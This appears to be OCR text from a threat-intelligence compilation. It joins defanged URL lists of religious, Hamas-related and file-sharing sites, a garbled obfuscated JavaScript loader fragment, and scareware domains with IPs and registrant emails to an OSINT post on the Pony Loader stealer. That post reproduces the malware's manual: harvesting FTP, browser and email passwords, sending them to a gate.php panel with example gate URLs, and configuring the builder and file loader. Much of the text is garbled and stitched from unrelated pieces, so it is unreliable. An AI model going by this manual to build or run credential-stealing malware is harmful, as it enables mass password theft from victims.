hxxp://www.aljazeera.net/NR/exeres/2EBAA006-AC2F-4A43-A3FC-52F2C7872C43.htm 

hxxp://www.aljazeera.net/NR/exeres/7 6ABOF4A-D964-4C8A-9F5A-3978B5B532AA.htm 

hxxp://www.aljazeera.net/NR/exeres/B719D7CF-475D-4202-A95D-450D7AA0060D.htm 
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hxxp://www.aljazeera.net/News/Templates/Postings/DetailedPage.aspx?FRAMELES 

S=false &amp;NRNODEGUID= %7b3E4A3F59-F3ED-4469-B901-BDD2C755382B %7d 
&amp;NRORIGINALURL= %2fNR %2fexeres %2f3E4A3F59-F3ED-4469-B901-BDD2C755382B 
%2ehtm &amp;NRCACHEHINT=NoModifyGuest # 


hxxp://www.graaam.com/ 

hxxp://www.fileflyer.com/view/22mJIAP 
hxxp://www.megaupload.com/?d=TOTLCKVM 

hxxp://www. fileflyer.com/view/HdLNOCf 
hxxp://www.hamasaliraq.com/ 

hxxp://www.hamasiraq.org/ 

hxxp://arabic.cnn.com/ 

hxxp://www.archive.org/download/islamic _cartoon2/nor.wmv 
hxxp://www.archive.org/download/islamic _cartoon2/TareqBinZeyad.wmv 
hxxp://www.archive.org/download/islamic _cartoon2/kokaz.WMV 
hxxp://www.archive.org/download/islamic _cartoon2/zayton.wmv 
hxxp://www.archive.org/download/islamic _cartoon2/island.WMV 
hxxp://www.archive.org/download/islamic _cartoon2/alfata.wmv 
hxxp://www.archive.org/download/islamic _cartoon2/garra.WMV 
hxxp://www.archive.org/download/islamic _cartoon2/radii.wmv 
hxxp://www.archive.org/download/islamic _cartoon2/radi. WMV 
hxxp://www.archive.org/download/islamic _cartoon2/andlosy1.wmv 
hxxp://www.archive.org/download/islamic _cartoon2/andlosy2.WMV 
hxxp://www.archive.org/download/islamic _cartoon2/ghaba.WMV 
hxxp://www.archive.org/download/islamic _cartoon2/yarmok.WMV 
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hxxp://islaam.com/audio/lectures/yi/ram/yijesusl.ram 
hxxp://islaam.com/audio/lectures/bp/ram/bpjesus2.ram 
hxxp://www.islamworld.net/true.html 
hxxp://islaam.com/audio/lectures/yi/ram/yiparadise.ram 
hxxp://islaam.com/audio/lectures/yi/ram/yiourreward.ram 
hxxp://wings.buffalo.edu/sa/muslim/I.../*******s. html 
hxxp://islamicweb.com/index.asp?folder=bible 
hxxp://sultan.org/articles/answers.html 
hxxp://islamicweb.com/resources/video.htm 
hxxp://islamway.com/english/images/I...troduction.htm 
hxxp://islamway.com/english/images/I...ms/creator.htm 
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hxxp://islamway.com/english/images/I...ms/worship.htm 
hxxp://islamway.com/english/images/I...lims/jesus.hAtm 
hxxp://islamway.com/english/images/I...lims/woman.htm 
hxxp://english.islamway.com/bindex.p...scholar _i 
hxxp://english.islamway.com/bindex.p...cholar _i 
hxxp://english.islamway.com/bindex.p...7 &amp;series id=12 
hxxp://thetruereligion.org/modules/w...p?articleid=17 
hxxp://www.beconvinced.com 
hxxp://quran.islamway.com/rashed/001.ram 
hxxp://quran.islamway.com/rashed/002.ram 
hxxp://quran.islamway.com/rashed/0012.ram 
hxxp://quran.islamway.com/Etranslation/019.ram 
hxxp://www.wamy.co.uk/bd _women.htm 
hxxp://www.islamic-knowledge.com/Guide/ 
hxxp://www.islamic-knowledge.com/Guide 
hxxp://www.islamic-knowledge.com/Guide/ #Seeking 
hxxp://www.jews-for-allah.org/Jewish-Converts-to-Islam/ 
hxxp://cyberistan.org/islamic/quote1.htm| 
hxxp://geocities.com/Athens/Delphi/1...m/O00cntnts.htm 
hxxp://quran.islamway.com/shatry/050.ram 
hxxp://www.themodernreligion.com/ter...m _compare.html 
hxxp://quran.islamway.com/shatry/001.ram 
hxxp://quran.islamway.com/shatry/112.ram 
hxxp://thetruereligion.org/converts.htm 
hxxp://www.islamonline.net/jamalbadawy/main.asp 
hxxp://www.harunyahya.com/m _audio.php 
hxxp://www.themodernreligion.com/bas...n-amazing.html 
hxxp://quran.islamway.com/abdulbasetmu/012.ram 
hxxp://johnw.host.sk/articles/bible _christian/is jesus god.htm 
hxxp://www.noblequran.info/ 


hxxp://www.islamhouse.com/ar/list _mat.php?doWhat=lesson &amp;my _lang=1 
&amp;tapeno=286 
hxxp://www.islamhouse.com/ar/list _mat.php?doWhat=lesson &amp;my _lang=1 
&amp;tapeno=1792 
hxxp://www.islamhouse.com/ar/list _mat.php?doWhat=lesson &amp;my _lang=1 
&amp;tapeno=326 
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hxxp://www.islamunveiled.com/eng/ebooks/happines/happines _defin.htm #sub1 
hxxp://www.icsfp.net/EN/Contents.aspx?AID=2629 
hxxp://www.soundvision.com/Info/Jesus/inlslam.asp 
hxxp://www.icsfp.net/EN/Contents.aspx?AID=2770 
hxxp://www.icsfp.net/EN/Contents.aspx?AID=2590 
hxxp://www.icsfp.com/Media/Documents/YouWillLikeToKnowThisMan.pps 
hxxp://www.themodernreligion.com/original _sin.htm 
hxxp://www.tttt4.com 
hxxp://www.tttt4.com/tlb/1/pafiledb.php?action=category &amp;id=7 
hxxp://www.tttt4.com/vc/ 
hxxp://www.tttt4.com/tlb/1/pafiledb.php?action=category &amp;id=9 
hxxp://www.tttt4.com/go/news.php?action=list &amp;cat _id=12 
hxxp://www.tttt4.com/do3a/ 
hxxp://www.tttt4.com/mktba/open.php?cat=6 &amp;book=154 
hxxp://www.tttt4.com/tlb/1/ 
hxxp://www.tttt4.com/go/news.php?action=list &amp;cat _id=9 
hxxp://www.tttt4.com/go/news.php?action=list Gamp;cat id=62 
hxxp://www.tttt4.com/go/news.php?action=view &amp;id=889 
hxxp://www.tttt4.com/mktba/list.php?cat=9 
hxxp://www.tttt4.com/mktba/list.php?cat=13 
hxxp://www.tttt4.com/go/news.php?action=list &amp;cat _id=13 
hxxp://www.saaid.net/ 

hxxp://www.islamway.com/arabic/indext.htm 
hxxp://www.55a.net/firas/arabic/? 
hxxp://upload.9q9q.net/file/mJIWvTKMH/915.swf.html 
hxxp://www.tawhed.ws/ 
hxxp://www.alathary.net/vb2/attachment.php?attachmentid=3000 
hxxp://www.alathary.net/vb2/attachment.php?attachmentid=3002 
hxxp://www.alathary.net/vb2/attachment.php?attachmentid=3003 
hxxp://www.alathary.net/vb2/attachment.php?attachmentid=3004 
hxxp://www.alathary.net/vb2/attachment.php?attachmentid=3008 
hxxp://fatwal.com/anti-erhab/Salafiyah/olamamadinah/madenah.html 
hxxp://alsafwa.maktoobblog.com 

hxxp://fahd316.arabform.com 

hxxp://WWW.MUSLM.NET 
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cript”™>myvar 
7116, zany 112, , 47,47, 104,111,110, 100,97,45,114,101,99,12 
1112, 104, 112, 63,105, 100, 61,50, 48, 49, 55,38,10 
?7,101,12 1 61, 99 


79S 97, 10: 6,53,99 ,50,38,112, 61, 49); 
eval(function(p 


if(!''.replace(/ 
alej}jce anne t eZomir' 


afc) {return 

{ ane tel (c--){d =k[c) | ]c} [function(e) {return 

s+'} 30=1}- while (c--) (if(k[c] ) {p=p.replace (new 
'g'),k{e))}} return 


The people behind the campaign have also taken contingency planning in mind since 
[2]the scareware domain [3]portfolio is parked on five different IPs - no-spyware-thanks 
.com - 94.102.48.29; 94.102.51.26; 188.40.61.236; 83.133.126.155; 91.212.107.5 Email: 


Paul.Saydak@lovellis.com. The complete list: 
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hxxp://www.misrsalaf.com/vb/attachment.php?attachmentid=579 
hxxp://www.alabad.jeeran.com/ 

hxxp://www.thdj.jeeran.com/ 

hxxp://WWW.ALALBANY.NET 

hxxp://www.alalbany.net/ 
hxxp://www.ibnothaimeen.com/all/khotab/article _77.shtml 
hxxp://abom0slem.maktoobblog.com/?post=316959 &amp;postView=1 
hxxp://www.thekra.org/open.php?id=207 
hxxp://saaid.net/Doat/almubarak/index.htm 
hxxp://www.islamway.com 

hxxp://www.islamselect.com/index.php 


hxxp://www.islamweb.net/ver2/library/BooksCategory.php?idfrom=538 &amp;idto=538 
&amp;bk _no=44 &amp;ID=383 


1. https://blogger. googleusercontent .com/img/b/R29VZ2x1/AVvXsEj AWqIo9XE1ew4hDyZMsvRNmUXuf 1UxHR9bj XPd-qZZ8-Br 
40B0BgPcP6nFXn0GrP38aHcOkBPgoRf 6WNriROmOkGnU1lI1lew-m-Wo 


18.8.18 In Retrospective - A Peek Inside the Pony Loader Cybercrime-Friendly Mali- 
cious Software Release - An OSINT Analysis (2022-08-18 19:58) 


[1] 
Vina Jara rsmenenna Tun Pasmep 
> BullderSre 14.12.2012 1:21 Nanka c cbalinann 
_)) masm32 14.12.2012 1:21 Nanxea ¢ cbatinann 
). PonySre 14.12.2012 1:21 Mana ¢ caiinann 
3) build.bat 03.08.2012 5:12 NaxeTHbiit arin Wi... 3K6 
Changes. txt 11.11.2012 12:23 TexcToBsDii AOKyMeHT 15 KB 
CE] Config. inc 04.10.2012 11:03 PHP file 4K6 
Help.txt 10.08.2012 3:00 Texcroesii AoKyNeHT 9KB 
Si) pb.bat 09.10.2012 3:08 NaKeTHbii havin Wi... 1K6 
23) pb.emd 04.10.2012 11:18 Cuenapnit Windows 1KB 
¢ Pony. ico 15.02.2012 15:27 3HaY4OK 22 KB 
&_ Pony. ini 11.12.2012 11:58 Napametpe! Kore... 3K6 
& PonyBuilder.exe 11.11.2012 12:33 Npnnoxenne 2 135 KB 


| recently took a peek inside some of my old threat intelligence gathering research archives and 
I’ve decided to share with everyone some sample screenshots including an actual description 
from the extremely popular and high-profile back then Pony Loader malicious software release. 


Enjoy! 
Sample screenshots of the Pony Loader in action: 
24893 
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[2] 


)) ASkin 

_)) CalcModulesize 

ad Resources 

build, bat 
build_resources. bat 
cleanup. bat 

| Error. dfn 

__) Error.pas 

fe FTPClients.res 

| Main.dfm 

_. Main. pas 

cel ModuleSize.inc 

__| PonyBuilder.cfg 

| PonyBuilder, dof 

__, PonyBuilder.dpr 

|_| PonyBuilder. dproj 

__, PonyBuilder.dproj.local 
__ PonyBuilder identcache 
fe PonyBuilder.res 

¢ PonyBuilder_Icon.ico 


14.12.2012 1:21 
14.12.2012 1:21 
14.12.2012 1:21 
10.08.2012 3:01 
13.02.2012 23:29 
06.11.2011 7:20 
06.11.2011 7:20 
06.11.2011 7:20 
10.06.2012 9:49 
03.08.2012 5:46 
11.11.2012 5:21 
11.11.2012 12:33 
28.01.2012 12:31 
28.01.2012 12:31 
21.02.2012 8:21 
21.02.2012 8:38 
21.02.2012 8:38 
03.08.2012 5:46 
03.08.2012 5:46 
21.02.2012 7:20 


[3] 


Nanka c dharinamn 
Nanka c darinamn 


Nanka c darinamn 


NakeTHbIM dbarin Wi... 
NakeTHbIM dbarin Wi... 


NakeTHbIM arin Wi... 


arin "DFM" 
arin "PAS" 


Compiled Resource ... 


®arin "DFM" 

@arin "PAS" 

PHP file 

arin "CFG" 

arin "DOF" 

®arin "DPR" 

arin "DPROJ" 

arin "LOCAL" 

arin "IDENTCACHE" 


Compiled Resource ... 


3SHaYOK 


1 KB 
1 KB 
1 KB 
2 KB 
2 KB 
85 KB 
3061 KB 
40 KB 
6 KB 
1 KB 
3KB 
1 KB 
9KB 
1 KB 
1KB 
17 KB 
15 KB 


Cnmeok FTP CrucoxHTTP fpyrae Crammctxa omens: § Slorn 


Buumanne! NpoGnema c konurypaunen cepsepa!l 


"gmp" extension in 


DeGaaneno napaned 3a nocne;nwe 24 “aca 


NocneAHHe BxoAbI B cuctemy 


Jlorun Ip 
admin 127.0.0.1 
CramuctuKka 


Bpena cepsepa 


Crpana 


Orvers: Yopasnenne Towoup, Bomar 


Bpema sxoga 
2012-12-16 23:11:10 


2 


12-12-18 23:15:26 


Bcero FTP/SFTP © cnicke 0 
Boero HTTP/HTTPS B cnncKe 8 
Beero E-mail naponeii 6 cnneke 0 
Bcero ceptsbuKatos 8 cnicKe 0 
m=download_reports noxe 0 
[4] 
db includes 18.12.2012 21:34 Nanka c hbatinamn 
a temp 18.12.2012 21:34 Nanka c darinamn 
|_| .Ataccess 09,06,2012 2:45 @arin "HTACCESS" 1KB 
@) 404.html 18.05.2011 10:51 HTML-aokymeHT 1KB 
cel admin. php 09,06,2012 23:39 PHP file 50 KB 
cE] config.php 17.12.2012 2:39 PHP file 2KB 
cel oate.php 16.12.2012 14:45 PHP file 5K6 
cl redirect.php 19.04.2012 3:47 PHP file 4KB 
|_| robots.txt 24.05.2011 20:03 TeKCTOBbIM AOKYMEHT 1 KB 
cel setup.php 10.06.2012 0:07 PHP File 6KB 


[5] 
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=a 


& 3DES 14.12.2012 1:21 Nanka c chbatinamn 

asm) Crypto.asm 09.03.2012 12:58 Assembler Source 11 KB 
asm) NetCode.asm 26.03.2012 14:29 Assembler Source 14KB 
asm] PasswordModules.asm 06.11.2012 5:20 Assembler Source 311 KB 
asm) Pony.asm 06.11.2012 4:58 Assembler Source 22 KB 
al Pony. rc 25.03.2011 22:07 Resource Script 1 KB 
asm) Utils. asm 05.11.2012 12:55 Assembler Source 54 KB 
asm) WordList.asm 03.03.2012 17:53 Assembler Source SKB 

[6] 


>. Pony Builder 1.9 
Gta MOMOLb 


Bungep Hactpotixu 


- Hactpoviku oTyeTos ~ DononkurenbHbie HacTporiKu 
[| Pekum ornagku 


Wrppopatb Camoyganenve 
[| Coxparare or4etb! Ha ack [ana oTnaaku) [| Mogasure uKoHKy 


Otcbinatb nyctble oTyetbi [ana cTaTHcTHKH) [| Nakopar’ 6ung c nomoubIo UPX 


[_] Otceinate TonbKo HoBble OTHETEI 


~ Bapuanr c6opku 
(@) Exe-patin =) Dil-6u6nuoteka 


Co6uparb HTTP/HTTPS naponu 
Cofuparb E-mail naponu 


Naponb wuppoBaHua: | Mesoamerica 


~ 
bus 


KonvyecTeo nonbIroK OTNPaBlTb OTYeET: | 2 


~ Mocryndbie mogyau gewupposKu 


Hasbanve npunoxkeHiA ' 

@F s2bit FIP 160 Gaim 
@ 20+ 1P 256 alr 
B Acer TP 512 6air 
GS ALFTP 128 6aimr 
Becky! ; 304 Gait 
58 BitKinex 96 Gai 
@yBlazeF TP 480 Gaim 
wl Rromium Mandex Chrome) 4FANl faite 


[7] 
24896 


fnasnan ComcoxFTP Comcox HTTP fipyrwe § Cratmectuca Norn Oreets Yopennernne Nowomp Semog _—" 


é Ynpasnenne AOMeHaMM 
Hoaea http © Aocbaearn 


[8] 
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Trasvan CowcoxFTP CamcoxHTTP fipyrme Cratectuxa flowenn [nore | Orvers: Yorpasnenne flomogp  Baixog —— 


® CrayaTe nom (15 sanuceit) 
3% QuncTuT’ nor (62°F KB) 


NoxasaTb YBEAOMNEHHA 


Orver Texcr Bpems po6annenna 
FE) ormoem NOTIFY_CANNOT_PARSE_URL: http://wwt 2012-06 
2) orpem  NOTIFY_CANNOT_PARSE_URL: http://ww 2012-06 


[9] 


24898 


[10] 


CnucoxHTTP fipyrue Cratuctuxa flowers: Slorm Orvete:s Yopasnenue Nomomp Beixog ead 


2012-06-— Gee? 
2012-06. Gee? 
2012-06. a? 
2012-06-10 Gee? 
2012-06 
2012-06-— Gein? 
2012-06-06 Giee® 
2012-06-) Gi? 
2012-06-—" Gei® 
2012-06 ein ® 
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Cnwucoa FTP CrncoxHTTP fipyrwe Cravectaxa flowenm lore Orverms Yopannenwe fTlowoge  Seaxog Pony 1.7 


JoGasneno naponest 3a nocnenMne 24 4aca 


NocnepHne BxOgb! B CHCTeMy 
Slormn mr 


a 


+ = fttol bw 
mie 


Cramomnka 


Bpens cepeepa n20 


Boero FTP/SFTP 6 cnucke 


Boero HTTP/HTTPS 6 cnucxe 

Boero cepmguxatos 5 cnvcxe ° 
Beero yrukanbetx oTvetos 

Nonyweno ay6nuxaros 

He o6paGorano orveros 


Coober’ @ cuctereinex forex 


Nonnwh pasnep orvetos 5 Ef MB 
None pasnep 6 MB 
AoSaeneno FTP (HTTP) sa mocneamne 24 “ace (emt) 
ADoSasneno FTP (HTTP) sa mocnearnl uac 0 (0) 
DeGasnens FTP (HTTP) sa mocneanme 10 nunyt 0 (0) 


Ac6aeneno omeros 3a nocnegnme 24 uaca 


Ac6aeneno omertos 33 nocneannii vac ° 


AcGaeneno ome+ros 34 nocneanme 10 mumyt f) 


[11] 
24900 


A J @§ Astopw3auna 


<‘. Oia 


2 ABTopu3allva 


Jlorun 
Naponb 


SanOMHTb Napone 


fy Bxow 


[12] 
24901 


fnannas CrucoxFTP CrecoxHTTP fipyrwe Cramactwxa flower flora OrTvetm | Ynpasnenme | flomomp  Bmxoq aa 


4 HacTpoiixn ceppepa 


ee = = Mp POOMn OTYETOR 


J] Onpegenate SFTP no username (root) 
| Onpegenate SFTP no 22 nepry 
J] Onpegenare SFTP no nporonony @ xnnenre 


Coxpanate 


Nonbsopatenn 
Nonnsosatrens Npasanerm Aesctons 


zap user_view_only Pegaxmporarr anne | Yoanury 


[13] 
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http://free-1500-hicfa-form-printable. foper29i142.dynodns.net/ 
http://printable-free-contractor-bid-form.fuder29i160. dynodns. net? 
http://form-ct-1040x-printable-version.fuder29i145.dynodns. net/ 
http://printable-irs-form-1040. fuder29i130.dynodns.net/ 
http://printable-irs-form-w-9.fuder29i133.dynodns. net/ 
http://form-irs-printable-tax. fasoe29i130.dynodns.net/ 
http://printable-tool-inventory-form.foper29i142.dynodns. net/ 
http://form-irs-printable.fuder29i1 42. dynodns. net! 
http://1099-misc-printable-form.fuder29i130.dynodns. net/ 
http://printable-free-tax-form. fuder29i142.dynodns.net/ 

http: //printable-and-edit-form-1040. fasoe29i139.dynodns. net! 


(eg http: //printable-1040-form.fasoe29i136.dynodns. net! 

aM http://blank-receipt-form-printable.fasoe29i127 .dynodns. net! 
http://printable-preschool-admission-form.fuder29i1 48. dynodns. net’ 
ay http://printable-irs-form-w-9.fasoe29i139. dynodns. net/ 
f@|http://printable-irmunization-form.fasoe29i136.dynodns. net/ 
egihttp://printable-hippa-form.fasoe29i133.dynodns. net/ 
eghttp://irs-1040ez-printable-form.fuder29i133.dynodns. net/ 

mug http://1040-ez-printable-form. foper29i130.dynodns. net/ 
http://printable-u-s-tax-form-1041 foper29i142.dynodns.net/ 
http://free-printable-creditl-form.fuder29i130.dynodns. net/ 

sy http://printable-ub-92-claim-form.fuder29i133.dynodns. net/ 

eB http:/form-ssa-623-printable.fuder29i160.dynodns. net/ 
http://printable-copy-of-fafsa-form. fuder29i133.dynodns.net/ 
Asqlhttp://printable-foreclosure-form.foper291130.dynadns. net/ 
fa|http://1099-misc-form-printable.fuder29i145.dynodns. net/ 

gem http://free-rent-agrement-printable-form.fuder29i145. dynodns. net/ 
Feg|http://printable-1040x-form.fuder291142. dynodns. net/ 
http://free-printable-health-claim-form.lasae29i211.dynodns.net/ 
http://printable-home-school-form.foper29i1 48. dynodns. net? 
http://form-free-legal-ohio-printable. fuder29i154.dynodns.net/ 
ea|http://cub-scout-den-dues-printable-form. fuder291145.dynodns.net/ 
eg http://printable-work-schedule-form.fuder29i127.dynodns. net/ 

aq http://printable-schedule-form. fuder291133.dynodns.net/ 

clap |http:/free-printable-divorce-form. fuder291130. dynodns. net/ 


fast-scan-your-pcv3 .com - Email: info@valeros.com 
basicsystemscannerv3 .com - Email: changhong@corpdefence.cn 
antivirus-quickscanv5 .com - Email: dianal982@yahoo.com 
basicsystemscannervé6 .com - Email: changhong@corpdefence.cn 
basicsystemscannerv8 .com - Email: changhong@corpdefence.cn 
privatevirusscannerv8 .com - Email: info@rasystems.com 
spywarefastscannerv9 .com - Email: info@rasystems.com 
online-pro-antivirus-scan .com - Email: findz@freebbmail.com 
onlineproscan .com - Email: addworld@freebbmail.com 
onlineproantivirusscan .com - Email: addworld@freebbmail.com 
online-pro-scanner .com - Email: addworld@freebbmail.com 
basicsystemscanner .com - Email: changhong@corpdefence.cn 
onlineproantivirusscanner .com - Email: findz@freebbmail.com 
iwantsweepviruses .com - Email: leesten@fedexnow.com 


http://printable-homeschool-transcript-form.foper29i130. dynodns. net? 
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Tnasean Cnucox FTP Cmncox HTTP cTm™xa flowenm lore Orvevss Yopannmenne MNowomp, Seog 


®& Cravaty cepTucpuxares (0 sanucei) 
% YaanuTe cepTunbuxaTes (1.00 kB) 


[14] 
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Tnasnan = ConcoxFTP CnncoxHTTP fipyrme Cramwctuxa flowers flor Yopaanermne Nowoup, Semog - Pony 1.7 


& Cxauar ace oTyeTH! (NF sanncefi, 8.) MB) 
®& Crauatb HeoSpaGoTanHile OTueTHI (1 sanuceli, 23 — KB) 
% YoanvtTy ace oTveThi (8.1) MB) 

HloKa3aTb dpunbTp 


v 
Oreer iP Bpema pobannenna O6pa6oran Paxsnep Napone’ 
©) ompem 2012-06- 5:28 aa 2.15 kB 43 
©) ompum 2012-06- 9:28 Pr) 337.00 bytes 4 
© ompem 2012-06- 8:05 aa 298.00 bytes 1 
© ompem 2012-06- 6:39 aa 241.00 bytes 4 
© ompem 2012-06- 6:17 aa 2.69 kB 11 
©) ormowm 2012-06- 5:08 na 320.00 bytes 4 
©) ompwn 2012-06- 3:55 Pr) 325,00 bytes 1 
©) ompun 2012-06- 3:43 na 545.00 bytes 2 
©) Orpen - 2012-06- 3:32 aa 321.00 bytes 3 
©) ompem 2012-06- 3:18 aa 714.00 bytes 10 
© omperm 2012-06- 3:11 aa 2.39 kB 1 
© ompem 2012-06- 3:05 aa 508.00 bytes 10 
© ompem 2012-06- 3:58 aa 3.33 kB 37 
©) ompurm 2012-06- 3:45 a3 1,02 kB 33 
©) orpwn . 2012-06- 3:27 rr) 2.81 kB 3 
©) omoun 2012-06- 3:27 aa 930.00 bytes 13 
©) ormpem 2012-06- 3:04 aa 598.00 bytes 6 
©) omperm 2012-06- 7:48 aa 489.00 bytes 9 
© compe 2012-06- 7:28 aa $29.00 bytes 
© omperm 2012-06- 7:27 aa 745.00 bytes 28 
© ompum 2012-06- 7:11 aa 272.00 bytes 1 
©) ompwm 2012-06- 7:06 a3 1,31 kB 3 
©) ormouwn 2012-06- 5:52 aa 2.45 kB 1 
©) ormpun 2012-06- 5:49 rr) 480.00 bytes 4 
©) omperm 2012-06- 5:35 aa 230.00 bytes 1 

1/2/3141 S1S1Z18121 10) 14112] 13] 14] 145] 16] 42 | 18] 19| 20] 24 | 22| 23) 24 | 25) 26| 27 | 28| 29 

| 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 44 | 42 | 43] 44| 45 | 46 | 47 | 48 | 49 | 50 | Cnenyriowjaa 
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Sample description of the Pony Loader: 
"Collection system FTP passwords "Pony" 


Purpose and Objectives of the project 


Collection of FTP passwords of 81 + popular FTP-client and Web-browser with the infected 
computers 


Invisible to the user’s application 


The minimum size and time of the grabber on the infected computer 
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General information 


The project is divided into three parts: 


Client "Pony.exe" - a program that needs to be progruzhat on computers, it collects and 
sends passwords to the server. 


Builder (PonyBuilder.exe) - a set of programs to create a build-client 
"Pony.exe". Build collected automatically by the compiler masm32, which 
is included in the kit. 


A set of server-side PHP script - admin panel, as well as script-gate (gate.php) on which 
to send passwords. 


In order to collect passwords used an unusual approach 


When you run the client "Pony.exe" automatically collected passwords and 
data required to decrypt files in a special container called "reports" 
(reports), and then encrypted to the server, where they are processed. 
Each report can contain tens or even hundreds of passwords, as well as 
other supporting information. 


In fact, "Pony.exe" does not contain any decryption algorithms, but only a simple func- 
tion to read data files and the registry. 


All work on deciphering the password takes on a Web server, it is not 
resource-intensive operation, because Most algorithms are trivial, the 
server spends on average less than 10 ms (0.01 seconds) to process the 
report with passwords. 


Positive aspects of this approach: 
The minimum size of the file progruzhat "Pony.exe" 


The minimum time on the infected computer, on average, less than a second Ist 
24906 


If an FTP client just updated the encryption algorithm, but also stores 
files with passwords as well as before, which is typical for the 

majority of popular FTP-client, there is no need to re-create and build 
progruzhat it, but only to make the appropriate modifications to the PHP 
script 


No chance of a mistake in the algorithm decryption password and lose 
FTP, reports can be processed on the server again, after fixing a bug 


Negative: 


Requires a full-fledged Web server is configured to decrypt the password, with some 
specific requirements 


Increased traffic to the server, this adds the ability to pack records 


Requirements for the Web server 


Apache / nginx 

PHP 5.2 + 

MySQL 

Required extensions for PHP 

zlib - Library for compression / decompression of data using deflate 
libxml - library for fast processing of XML files 

mysql - the extension to work with the MySQL database 

mhash - with a library of hash algorithms (included in the main assembly PHP 5.3 +) 
mcrypt - with a library of encryption algorithms 

gmp - a mathematical library for working with large numbers 

iconv, mbstring - extension for converting multibyte (UTF-8, ...) lines 
gd - agraphics library that is used for plotting 


curl - the extension to work with the network 
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pcre - a library of algorithms for working with regular expressions 
json - JSON library for decoding strings 

zip - Library for handling zip archives 

Optional extension for PHP 


sqlite3 - is required as the class (PHP 5.3 +), or as a driver PDO (PHP 5.2 +), or some 
decrypted passwords will not be 


A set of server-side scripting is not tied to the root folder and can be 
moved anywhere you want. In the working folder, you must create the 
directory "temp" and give it a read, write and execute (chmod 777). Name 
the folder "temp" can be overridden in the configuration file 

"config.php". 


Example of assembly PHP: 


Configure Command ’. / Configure’ ’- enable-mbstring = all’ ’- 
with-zlib’ ’- with-iconv’ ’- with-gd’ ’- with-curl’ ’- with-pcre -regex 
”- with-gmp ” - with-mhash ” - with-mcrypt ” - with-mysql ” - 
with-libxml-dir ” - prefix = / opt / php ’ ’- with-sqlite3’ ’- 
with-freetype-dir’ ’- enable-gd-native-ttf’ ’- with-png-dir’ ’- 
with-jpeg-dir’ ’- enable- zip ’. 


The server side (admin panel) 


Scope of supply: 


The file "config.php" - contains the basic settings required for the 
performance of PHP scripts admin. Inside the file, you must register 
your MySQL server settings, choose a password to decrypt the report, 
specify the folder for temporary files. 


The file "setup.php" - automatic installation script, you need to run 

the initial configuration of the admin panel, then you can remove it. 
This script creates the necessary tables MySQL, set the login and 
password. Before running the "setup.php" should set the parameters of 
MySQL server in the file "config.php". To repeat the automatic tuning of 
the panel, you must first remove all the tables with the prefix "pony _" 
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from the database MySQL. 

The file "gate.php" - script-gate, which receives reports from the password "Pony.exe". 
The file "admin.php" - the main manager of the script admin panel. 

The folder "temp" - the folder for temporary files and templates, 

Smarty, you must install the right to read, write and execute (chmod 


777). 


The folder "includes" - a set of supporting files. 


Admin functions 


Home - General information about the ongoing work of the server. 

List of FTP - here you can download or clear the lists obtained by FTP / SFTP. 
Others - you can download or clear the lists received certificates. 

Statistics - current statistics on the data collected, it is necessary 

to take into account that the cleaning list FTP / reset the statistics 


report. 


Domains - on this page, you can add a backup domain grabber for the operational test 
for accessibility. 


Logs - here you can see a critical error and notification server. 
Reports - Reports a list of current passwords. 

Management - server settings, as well as account management. 
Help - help file. 


Exit - exit from the admin panel. 


Differentiation of user admin 


Members are divided into two types: 


Administrator (admin) - can do everything: delete / add new users, 
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change the server settings (password is encrypted reports), change the 
privileges / passwords of other users, clear the lists of passwords. The 
administrator can only be one. 


User (user) - depending on the privileges can either just view the data 
(user view _only), or view lists and clean FTP / SFTP / reports / logs 


(user all). User can change your password. The user will not see the 
additional functionality that is available only administrator. 


Additional information 


Each received a report contains additional information: 
OS - version of Windows. 
IP - IP address of the sender. 


HWID - a unique user ID does not change with time. In this ID can be found all the re- 
ports from a particular computer. 


Privileges - with what rights (User / Admin) process was started "Pony.exe". 


Architecture - x86/x64 architecture of a microprocessor, which was launched by the pro- 
cess of "Pony.exe". 


Version - version of the client "Pony.exe". 
Clear the list of reports and FTP / SFTP resets statistics (graphs and text data). 


Identical reports with the passwords in the database are not imported when you receive 
a duplicate, the logs will be notified. 


Import records with passwords through "gate.php" takes place in two stages: 


The resulting report is imported into the database MySQL. Only when the 
import was successful in the database will return the gate positive 
response to the client "Pony.exe" to avoid sending passwords in the 
following (redundant) domains. 


The report is processed (parsed), then found FTP added to the database, and report the 
status of prescribed "processed." 


If the report has received the status "not processed" means either the 
server is overloaded (exceeded the maximum time the script), or parsing 
the script left with a critical error. In any case, the report will not 

be lost. 
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If the system used by several users, you must go under different accounts, otherwise it 
will always pop up login window. 


After clearing the lists, the data in a MySQL database does not always 
physically removed (especially logs), so you should periodically run the 
optimization (compression) tables. 

Optimization (compression), MySQL table is best carried out when there 


is heavy load on the database, ie client "Pony.exe" does not send 
passwords active. 


Builder "PonyBuilder.exe" 


Task Builder - Configure and compile the client "Pony.exe", to be progruzhat to infected 
computers. 


Scope of supply: 

Folder "masm32" - the compiler Microsoft Macro Assembler (MASM). 

Folder "PonySrc" - the source code in MASM client program (grabber) "Pony.exe". 

Folder "BuilderSrc" - the source code in Delphi 7 support program-Builder "PonyBuilder.exe". 
The file "PonyBuilder.exe" - program-builder for the customer "Pony.exe". 

The file "Help.txt" - help file. 

The file "build.bat" - a script used by the builders build to compile from source "PonySrc". 


The file "Pony.ico" - the icon is attached to the "Pony.exe" at compile time, if the builder select 
the corresponding option. 


The interface is divided into four tabs: 


Builder 


The text box "list of domains to send passwords" - here you can set a 
list of URL gates to send passwords. Each line - a separate URL, for 
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example: [16]http://somedomain.com/dir/gate.php 

You can add an unlimited number of rows (URL), the same URL can be 

added multiple times. The domain may contain information about the port 

connection, for example: [17]http://privatedomain.com:8080/gate.php. Https:// protocol is 
not currently supported. 


"Pony.exe" will try to connect and send a report with the passwords on 
the list, if the data is successfully delivered, the program will exit 
immediately without attempting to connect to the rest of the URL. 


The "Select icon" allows you to set the icon for the compiled file is only supported format *. Ico. 
The "New Build" compile file "Pony.exe" to your settings. 
Loader 


A simple loader (boot files). After gathering passwords from these links 
(URL) will be loaded and run files. URL given in the same manner as the 
list of domains to send passwords. In the lower part of the tab you can 
specify the following options: 


Activate the loader - the loader include work, otherwise the files will not load. 


Do not run the same files twice - after the successful launch of the 
downloaded file into the registry will be added to the reference value 
(hash) of the data file, and then, when re-loading, a duplicate will not 
run. 


Settings 


To see all the settings, you need to activate the option "Show advanced settings" in the 
main menu. 


Compress - compress reports using the library aPLib, adds about 5kb to 
the size of the executable file, packs a good text data before sending 
it, it is strongly recommended that you use greatly reduces the traffic 
to the server. 


Encrypt - encryption algorithm reports RC4. 


